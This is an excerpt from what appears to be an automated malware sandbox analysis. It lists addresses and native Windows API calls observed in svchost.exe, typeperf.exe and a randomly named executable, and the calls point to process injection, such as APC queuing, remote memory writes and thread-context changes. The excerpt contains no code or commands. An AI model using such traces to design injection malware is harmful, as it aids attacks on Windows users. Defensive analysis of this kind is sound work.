            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C74650 NtSuspendThread | 9_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72BE0 NtQueryValueKey | 9_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72BF0 NtAllocateVirtualMemory | 9_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72B80 NtQueryInformationFile | 9_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72BA0 NtEnumerateValueKey | 9_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72AD0 NtReadFile | 9_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72AF0 NtWriteFile | 9_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72AB0 NtWaitForSingleObject | 9_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C739B0 NtGetContextThread | 9_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72FE0 NtCreateFile | 9_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72F90 NtProtectVirtualMemory | 9_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72FA0 NtQuerySection | 9_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72FB0 NtResumeThread | 9_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72F60 NtCreateProcessEx | 9_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72F30 NtCreateSection | 9_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72EE0 NtQueueApcThread | 9_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72E80 NtReadVirtualMemory | 9_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72EA0 NtAdjustPrivilegesToken | 9_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72E30 NtWriteVirtualMemory | 9_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72DD0 NtDelayExecution | 9_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72DB0 NtEnumerateKey | 9_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C73D70 NtOpenThread | 9_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72D00 NtSetInformationFile | 9_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72D10 NtMapViewOfSection | 9_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C73D10 NtOpenProcessToken | 9_2_03C73D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72D30 NtUnmapViewOfSection | 9_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72CC0 NtQueryVirtualMemory | 9_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72CF0 NtOpenProcess | 9_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72CA0 NtQueryInformationToken | 9_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72C60 NtCreateKey | 9_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72C70 NtFreeVirtualMemory | 9_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C72C00 NtQueryInformationProcess | 9_2_03C72C00
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03174340 NtSetContextThread,LdrInitializeThunk | 12_2_03174340
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03174650 NtSuspendThread,LdrInitializeThunk | 12_2_03174650
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_031735C0 NtCreateMutant,LdrInitializeThunk | 12_2_031735C0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172B60 NtClose,LdrInitializeThunk | 12_2_03172B60
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172BA0 NtEnumerateValueKey,LdrInitializeThunk | 12_2_03172BA0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172BF0 NtAllocateVirtualMemory,LdrInitializeThunk | 12_2_03172BF0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172BE0 NtQueryValueKey,LdrInitializeThunk | 12_2_03172BE0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172AD0 NtReadFile,LdrInitializeThunk | 12_2_03172AD0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172AF0 NtWriteFile,LdrInitializeThunk | 12_2_03172AF0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_031739B0 NtGetContextThread,LdrInitializeThunk | 12_2_031739B0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172F30 NtCreateSection,LdrInitializeThunk | 12_2_03172F30
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172FB0 NtResumeThread,LdrInitializeThunk | 12_2_03172FB0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172FE0 NtCreateFile,LdrInitializeThunk | 12_2_03172FE0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172E80 NtReadVirtualMemory,LdrInitializeThunk | 12_2_03172E80
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172EE0 NtQueueApcThread,LdrInitializeThunk | 12_2_03172EE0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172D10 NtMapViewOfSection,LdrInitializeThunk | 12_2_03172D10
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172D30 NtUnmapViewOfSection,LdrInitializeThunk | 12_2_03172D30
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172DD0 NtDelayExecution,LdrInitializeThunk | 12_2_03172DD0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk | 12_2_03172DF0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk | 12_2_03172C70
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172C60 NtCreateKey,LdrInitializeThunk | 12_2_03172C60
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172CA0 NtQueryInformationToken,LdrInitializeThunk | 12_2_03172CA0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03173010 NtOpenDirectoryObject | 12_2_03173010
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03173090 NtSetValueKey | 12_2_03173090
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172B80 NtQueryInformationFile | 12_2_03172B80
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172AB0 NtWaitForSingleObject | 12_2_03172AB0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172F60 NtCreateProcessEx | 12_2_03172F60
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172F90 NtProtectVirtualMemory | 12_2_03172F90
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172FA0 NtQuerySection | 12_2_03172FA0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172E30 NtWriteVirtualMemory | 12_2_03172E30
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172EA0 NtAdjustPrivilegesToken | 12_2_03172EA0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03173D10 NtOpenProcessToken | 12_2_03173D10
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172D00 NtSetInformationFile | 12_2_03172D00
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03173D70 NtOpenThread | 12_2_03173D70
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172DB0 NtEnumerateKey | 12_2_03172DB0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172C00 NtQueryInformationProcess | 12_2_03172C00
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172CC0 NtQueryVirtualMemory | 12_2_03172CC0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_03172CF0 NtOpenProcess | 12_2_03172CF0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005D90C0 NtReadFile | 12_2_005D90C0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005D91B0 NtDeleteFile | 12_2_005D91B0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005D9250 NtClose | 12_2_005D9250
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005D93B0 NtAllocateVirtualMemory | 12_2_005D93B0
            Source: C:\Windows\SysWOW64\typeperf.exe | Code function: 12_2_005D8F50 NtCreateFile | 12_2_005D8F50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00401540 | 9_2_00401540
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00418773 | 9_2_00418773
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00410003 | 9_2_00410003
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00416953 | 9_2_00416953
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00401130 | 9_2_00401130
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00403250 | 9_2_00403250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00410223 | 9_2_00410223
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_004012C0 | 9_2_004012C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0040E2A3 | 9_2_0040E2A3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0042ED53 | 9_2_0042ED53
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00402DC0 | 9_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00402DB9 | 9_2_00402DB9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_0040262D | 9_2_0040262D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_00402630 | 9_2_00402630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C4E3F0 | 9_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03D003E6 | 9_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C8739A | 9_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C2D34C | 9_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFA352 | 9_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF132D | 9_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C5B2C0 | 9_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CE12ED | 9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C452A0 | 9_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CE0274 | 9_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF81CC | 9_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C4B1B0 | 9_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03D001AA | 9_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C7516C | 9_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C2F172 | 9_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03D0B16B | 9_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C30100 | 9_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CDA118 | 9_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CEF0CC | 9_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C470C0 | 9_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF70E9 | 9_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFF0E0 | 9_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C3C7C0 | 9_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFF7B0 | 9_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C64750 | 9_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C40770 | 9_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF16CC | 9_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C5C6E0 | 9_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03D00591 | 9_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CDD5B0 | 9_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF7571 | 9_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C40535 | 9_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CEE4F6 | 9_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF2446 | 9_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C31460 | 9_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFF43F | 9_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF6BD7 | 9_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C7DBF9 | 9_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C5FB80 | 9_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFAB40 | 9_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFFB76 | 9_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CEDAC6 | 9_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C3EA80 | 9_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CDDAAC | 9_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C85AA0 | 9_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFFA49 | 9_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF7A46 | 9_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CB3A6C | 9_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C429A0 | 9_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03D0A9A6 | 9_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C49950 | 9_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C5B950 | 9_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C56962 | 9_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C438E0 | 9_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C6E8F0 | 9_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C268B8 | 9_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C42840 | 9_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C4A840 | 9_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C32FC8 | 9_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C4CFE0 | 9_2_03C4CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C41F92 | 9_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFFFB1 | 9_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CB4F40 | 9_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFFF09 | 9_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C82F28 | 9_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C60F30 | 9_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFEEDB | 9_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C52E90 | 9_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFCE93 | 9_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C49EB0 | 9_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C40E59 | 9_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFEE26 | 9_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C5FDC0 | 9_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C3ADE0 | 9_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C58DBF | 9_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C43D40 | 9_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF1D5A | 9_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CF7D73 | 9_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C4AD00 | 9_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C30CF2 | 9_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CFFCF2 | 9_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CE0CB5 | 9_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03C40C00 | 9_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 9_2_03CB9C32 | 9_2_03CB9C32
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F132D12_2_031F132D
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FA35212_2_031FA352
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0312D34C12_2_0312D34C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0318739A12_2_0318739A
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_032003E612_2_032003E6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314E3F012_2_0314E3F0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031E027412_2_031E0274
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031452A012_2_031452A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315B2C012_2_0315B2C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031E12ED12_2_031E12ED
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031DA11812_2_031DA118
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313010012_2_03130100
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0320B16B12_2_0320B16B
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0312F17212_2_0312F172
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0317516C12_2_0317516C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_032001AA12_2_032001AA
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314B1B012_2_0314B1B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F81CC12_2_031F81CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031EF0CC12_2_031EF0CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031470C012_2_031470C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F70E912_2_031F70E9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FF0E012_2_031FF0E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0316475012_2_03164750
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314077012_2_03140770
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FF7B012_2_031FF7B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313C7C012_2_0313C7C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F16CC12_2_031F16CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315C6E012_2_0315C6E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314053512_2_03140535
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F757112_2_031F7571
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031DD5B012_2_031DD5B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0320059112_2_03200591
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FF43F12_2_031FF43F
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F244612_2_031F2446
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313146012_2_03131460
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031EE4F612_2_031EE4F6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FAB4012_2_031FAB40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFB7612_2_031FFB76
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315FB8012_2_0315FB80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F6BD712_2_031F6BD7
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0317DBF912_2_0317DBF9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFA4912_2_031FFA49
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F7A4612_2_031F7A46
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031B3A6C12_2_031B3A6C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313EA8012_2_0313EA80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031DDAAC12_2_031DDAAC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03185AA012_2_03185AA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031EDAC612_2_031EDAC6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314995012_2_03149950
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315B95012_2_0315B950
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315696212_2_03156962
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0320A9A612_2_0320A9A6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031429A012_2_031429A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314284012_2_03142840
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314A84012_2_0314A840
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031268B812_2_031268B8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0316E8F012_2_0316E8F0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031438E012_2_031438E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFF0912_2_031FFF09
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03160F3012_2_03160F30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03182F2812_2_03182F28
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031B4F4012_2_031B4F40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03141F9212_2_03141F92
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFFB112_2_031FFFB1
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03132FC812_2_03132FC8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314CFE012_2_0314CFE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FEE2612_2_031FEE26
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03140E5912_2_03140E59
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03152E9012_2_03152E90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FCE9312_2_031FCE93
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03149EB012_2_03149EB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FEEDB12_2_031FEEDB
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314AD0012_2_0314AD00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F1D5A12_2_031F1D5A
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03143D4012_2_03143D40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F7D7312_2_031F7D73
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03158DBF12_2_03158DBF
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315FDC012_2_0315FDC0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313ADE012_2_0313ADE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03140C0012_2_03140C00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031B9C3212_2_031B9C32
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031E0CB512_2_031E0CB5
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03130CF212_2_03130CF2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFCF212_2_031FFCF2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005C1C1012_2_005C1C10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005C52A012_2_005C52A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005C348012_2_005C3480
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005DB88012_2_005DB880
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005BCB3012_2_005BCB30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005BCD5012_2_005BCD50
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005BADD012_2_005BADD0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5E28412_2_02E5E284
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5E3A312_2_02E5E3A3
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5D7A812_2_02E5D7A8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5E74412_2_02E5E744
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5E50B12_2_02E5E50B
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DF6D2514_2_04DF6D25
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DD061B14_2_04DD061B
